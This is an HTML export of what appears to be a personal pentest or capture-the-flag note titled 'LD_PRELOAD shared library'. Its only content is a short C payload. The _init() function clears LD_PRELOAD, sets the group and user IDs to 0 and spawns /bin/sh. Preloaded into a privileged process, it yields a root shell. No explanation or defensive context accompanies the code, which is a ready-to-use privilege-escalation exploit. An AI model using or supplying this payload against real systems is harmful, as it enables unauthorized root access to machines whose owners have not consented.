<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../../style.css">
    <base target="_parent">
    <title data-trilium-title>LD_PRELOAD shared library</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>LD_PRELOAD shared library</h1>

      <div class="ck-content"><pre><code class="language-text-x-csrc">#include &lt;stdio.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;stdlib.h&gt;
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}</code></pre>
      </div>
    </div>
  </body>

</html>